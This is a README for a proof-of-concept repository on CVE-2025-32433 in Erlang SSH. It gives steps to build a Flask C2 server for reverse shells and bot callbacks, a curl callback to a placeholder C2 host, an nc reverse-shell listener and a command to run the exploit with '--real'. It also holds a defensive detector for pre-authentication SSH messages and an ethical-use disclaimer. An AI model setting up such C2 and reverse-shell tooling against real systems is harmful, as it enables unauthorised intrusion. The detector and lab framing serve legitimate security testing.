POC_CVE-2025-32433

readme

## ⚠️ Ethical Disclaimer

This repository contains code that demonstrates a real CVE (CVE-2025-32433). Use it **only in environments where you have explicit authorization**. Never test this exploit against systems you do not own or manage. Unauthorized use is illegal, unethical, and harmful to the cybersecurity community.

## Simulated and real PoC for CVE-2025-32433

My homie Chocapikk showed me this found PoC, erling_cve.py. I was intrigued and wanted to test it in a safe environment.

You have two choices with this repo: the safe simulated script and system I lay out below, or the real-deal erling_cve.py (in an ethical way, with caution, and only on networks you have permission to test).

Before using this tool to test or run an actual exploit, check out my homie m0usem0use and his Python script to find vulnerable targets of CVE-2025-32433: https://github.com/m0usem0use/erl_mouse

---

## Simulated version of the exploit for CVE-2025-32433

### Set up the C2 server

Build a Python Flask-based C2: powerful for bot callbacks or reverse shells.

Run this setup script on the C2 server:

```
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py
```

Paste in the c2_server script and edit as needed, then run:

```
python3 c2_server.py
```

Bots (or test scripts) can curl home like this:

```
curl -X POST http://<linode-ip>:8080/report -d "Bot is online"
```

### Set up a Python venv on Kali

```
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
```

Create a Python virtual environment:

```
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
```

### Test the callback

```
nano test_callback.py
```

Paste in the test_callback script and edit as needed, then run the callback:

```
python3 test_callback.py
```

You now officially have:

- A working venv
- A live cloud C2
- Functional callback injection

You need the target/victim machine to have an Erlang process or service exposed (or simulated).

---

## What does erling_cve.py do?

- Connects to port 22 of a target IP
- Sends a fake SSH version string
- Sends a crafted packet (likely to trigger a vuln — pretending to abuse something like Erlang's undocumented SSH handler or buffer overflow)
- Triggers a reverse shell back to the attacker IP
- Simulates post-exploitation by running commands like whoami, uname, and fake "credential exfil" to /tmp/exfil.log

We'll take our found Erlang-ish PoC and:

- Make it functional inside the Kali venv
- Wire it to report to our cloud C2 when the "attack" runs
- Run it ethically and safely within a controlled lab
- Watch it generate /tmp/exfil.log to simulate stolen data

---

From the Kali machine:

```
nano poc_erlang_test.py
```

Paste in poc_erlang_test.py and edit as needed.

Open a listener in a new terminal:

```
nc -lvnp 4444
```

Run the PoC:

```
python poc_erlang_test.py --real
```
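A defender-side check for the traffic pattern described above (a version string followed by a crafted packet), as an added example that is not part of this repository. It assumes, from the public advisory for CVE-2025-32433 rather than from this page, that the flaw lets a client send SSH connection-protocol messages (numbers 80-127, RFC 4250) before authentication; the `frame` helper and both sample streams are constructed.

```python
import struct

SSH_MSG_NEWKEYS = 21               # after this, packets are encrypted
CONNECTION_MSGS = range(80, 128)   # RFC 4250: connection-protocol numbers

def split_banner(stream: bytes):
    """Split off the identification line (RFC 4253 section 4.2)."""
    end = stream.find(b"\n")
    if end == -1 or not stream.startswith(b"SSH-"):
        raise ValueError("no SSH identification string")
    return stream[:end].rstrip(b"\r").decode("ascii", "replace"), stream[end + 1:]

def cleartext_packets(data: bytes):
    """Yield (msg_type, body) for unencrypted binary packets (RFC 4253 section 6)."""
    off = 0
    while off + 5 <= len(data):
        pkt_len, pad_len = struct.unpack_from(">IB", data, off)
        end = off + 4 + pkt_len
        if pkt_len < 2 or pad_len > pkt_len - 2 or end > len(data):
            return  # truncated capture or not a cleartext SSH packet
        payload = data[off + 5:end - pad_len]
        yield payload[0], payload[1:]
        off = end

def preauth_findings(client_stream: bytes):
    """Return (banner, [connection-protocol message numbers seen before NEWKEYS])."""
    banner, rest = split_banner(client_stream)
    hits = []
    for msg_type, _body in cleartext_packets(rest):
        if msg_type == SSH_MSG_NEWKEYS:
            break  # key exchange finished; later traffic cannot be read
        if msg_type in CONNECTION_MSGS:
            hits.append(msg_type)  # must never appear this early
    return banner, hits

def frame(msg_type: int, body: bytes = b"") -> bytes:
    """Constructed-sample helper: wrap a payload in cleartext SSH framing."""
    payload = bytes([msg_type]) + body
    pad = 8 - (5 + len(payload)) % 8
    pad += 8 if pad < 4 else 0
    return struct.pack(">IB", len(payload) + pad + 1, pad) + payload + bytes(pad)

# Constructed client-to-server streams; bodies are zero filler, not real messages.
NORMAL = b"SSH-2.0-OpenSSH_9.6\r\n" + frame(20, bytes(16)) + frame(30, bytes(32)) + frame(21)
SUSPECT = b"SSH-2.0-client\r\n" + frame(20, bytes(16)) + frame(90, bytes(8)) + frame(98, bytes(8))

if __name__ == "__main__":
    for name, stream in (("normal", NORMAL), ("suspect", SUSPECT)):
        print(name, preauth_findings(stream))
```

The check only sees cleartext packets, so feed it the client-to-server half of a reassembled TCP stream from a lab capture; any non-empty result means connection-protocol messages arrived before key exchange finished.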

license

MIT License

Copyright (c) 2026 ek0mssavi0r

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.